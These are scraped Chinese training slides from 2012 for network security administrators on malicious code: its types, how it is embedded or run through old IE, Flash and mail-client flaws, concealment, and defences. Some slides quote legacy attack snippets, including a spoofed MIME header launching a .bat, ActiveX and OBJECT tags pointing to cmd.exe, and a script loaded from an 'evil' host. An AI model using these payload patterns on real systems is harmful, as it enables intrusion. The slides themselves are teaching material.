网络通信安全管理员(中级)-05-计算机恶意代码与防护
更新时间:2023-08-21 05:16:01 阅读量: 高等教育 文档下载
- 网络通信安全管理员三级推荐度:
- 相关推荐
bd336x280();1_0_233_205_5_5_1263_892.83-16-0-3408-16.jpg" alt="网络通信安全管理员(中级)-05-计算机恶意代码与防护" />
网络通信安全管理员-中级
第五章计算机恶意代码与防护
讲师:谢诚
通信行业职业技能鉴定中心培训教程
2012年2月
目录
5.1 计算机恶意代码的主要类型 5.2 计算机恶意代码分析 5.3 常见恶意代码感染迹象与处理 5.4 计算机恶意代码防护
Overview
什么是恶意代码
恶意代码如何会在你的系统上运行 防御恶意代码
什么是恶意代码
二进制文件 病毒、木马、逻辑炸弹脚本 各种脚本语言嵌入文档的脚本宏
什么是宏
Bimary File Format
恶意代码如何会被运行
伪装成有用的文件嵌入其他文件利用系统漏洞欺骗
Overview
什么是恶意代码
方向
服务器 客户端、p2p
客户端 服务器
恶意代码如何会在你的系统上运行 防御恶意代码
伪装成有用的文件
Bind Exploit
Php OF Exploit
邮件欺骗
Wantjob变种
“中国黑客”
“You win ……free porn……”
嵌入其他文件
二进制可执行文件嵌入
病毒式的感染
insertcode.exe
EXEbind
脚本嵌入
Word系列文件、lotus系列文件
HTML!!!
利用系统漏洞
lotus Notes 邮件对象嵌入(略) Word 2000带有模板文件链接的RTF文件(略)
利用flash本身的漏洞
=<6.0.29 畸形文件头缓冲区溢出
<6.0.29 "movie"参数缓冲区溢出
IE的多个问题
OE、outlook、foxmail……
IE的多个问题
IE 5.5 以下异常处理MIME头 IE 5.5 以下
com.ms.activeX.ActiveXComponent对象嵌入
IE 5.5 以下codebase指向
IE 6.0 window.PoPup()window.Open() 如何利用来运行指定的程序
IE5.5 以下异常处理MIME头nimda、wantjob、中国黑客、爱情森林Content-Type: audio/x-wav;
name="hello.bat"
Content-Transfer-Encoding: quoted-printableContent-ID: <THE-CID>
cmd.exe
com.ms.activeX.ActiveXComponent对象嵌入<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>
<SCRIPT>
…………
<SCRIPT>
IE 5.5以下codebase指向CLSID不为0
CODEBASE指向绝对路径<OBJECT CLASSID =
'CLSID:10000000-0-0-0-0' CODEBASE =
'\Winnt\system32\cmd.exe'></OBJECT>
加密和隐藏
不直接写在html文件里
<script language="javascript"
src="http://evil/bad.js"></script>多次跳转
藏在flash文件里
加密
加壳
screnc.exe
让代码运行
IE对文件格式的自动识别
对html文件的自动识别
txt欺骗
对图片文件的自动识别
论坛
允许上传图片
允许上传头像
CGI的过滤
让代码运行
跨站脚本 简单介绍HTML邮件
Overview
什么是恶意代码
方向
服务器 客户端、p2p
客户端 服务器
恶意代码如何会在你的系统上运行 防御恶意代码
针对
利用IE问题的对策禁用某些脚本功能 禁用下载 Windows update IE 6问题目前没有补丁 注册表被修改之后 /download/othertools/Duba_Reg Solve.exe
针对利用IE问题的对策
1、在IE的“internet选项”中的“安全”项中把“安全级别”设为“高”,或在“自定义级别”中把“对标记为可安全执行的ActiveX控件执行脚本”标记为“禁用”。
此措施仅对WEB上的代码有效,对于本地文件无效。
正在阅读:
网络通信安全管理员(中级)-05-计算机恶意代码与防护08-21
分离课后习题及答案04-05
五年级上册《古人谈读书》原文及翻译03-27
酒店长包房租赁协议书doc07-28
百里不同风十里不同俗_今日芜湖新民俗05-10
进化树建树方法及软件使用04-22
2018-2019九年级英语上册Unit5ArtworldPeriod6Task课时训练新版牛津版12-29
中考古诗词赏析材料05-18
- 2012诗歌鉴赏讲座 师大附中张海波
- 2012-2013学年江苏省苏州市五市三区高三(上)期中数学模拟试卷(一)
- 市政基础设施工程竣工验收资料
- 小方坯连铸机专用超越离合器(引锭杆存放用)
- 荀子的学术性质之我见
- 氩弧焊管轧纹生产线操作说明
- 小学科学六年级上册教案
- (商务)英语专业大全
- 外汇储备的快速增长对我国经济发展的影响
- 幼儿园中班优秀语言教案《小猴的出租车》
- 第七章 仪表与显示系统
- 身份证号码前6位行政区划与籍贯对应表
- 单位(子单位)工程验收通知书
- 浅谈地铁工程施工的项目成本管理
- 沉积学知识点整理
- 前期物业管理中物业服务企业的法律地位
- 2014微量养分营养试卷
- 地质专业校内实习报告范文(通用版)
- 内部审计视角下我国高校教育经费支出绩效审计研究
- 高次插值龙格现象并作图数值分析实验1
- 网络通信
- 中级
- 恶意
- 防护
- 管理员
- 代码
- 计算机
- 安全
- 05
- 四年级研究性学习计划
- 2010年4月全国自考市场营销学试题和答案
- 2017-2023年中国及全球人工造雾行业市场发展战略分析及投资前景专项预测报告(目录)
- 试论雷纳&183;韦勒克的批评史研究
- 无机化学-定量分析概论试题
- win7旗舰版怎样登录隐藏账户
- 基于Windchill的产品配置管理研究
- 你的财富就是你自己
- 公司接待管理规定
- 考研各大题型考查重点难点分析及建议
- 商品房产租赁合同 - 营口企业之窗
- 怎么疏导中学生的逆反心理
- 经济责任审计风险的成因及其防范措施
- 268教育软件网校开发与时俱进 带你开拓学无止境的向上人生路
- 高级电工机考试题(1-8套)
- 一种改进的全局Retinex监控视频图像增强方法
- 人教版新课标(2016秋)二年级数学上册期末复习检测卷
- 司法考试法律条文的学习技巧
- 本册综合与测试 本次测试1(历史岳麓版九年级上册)
- SF6断路器运行中问题的探究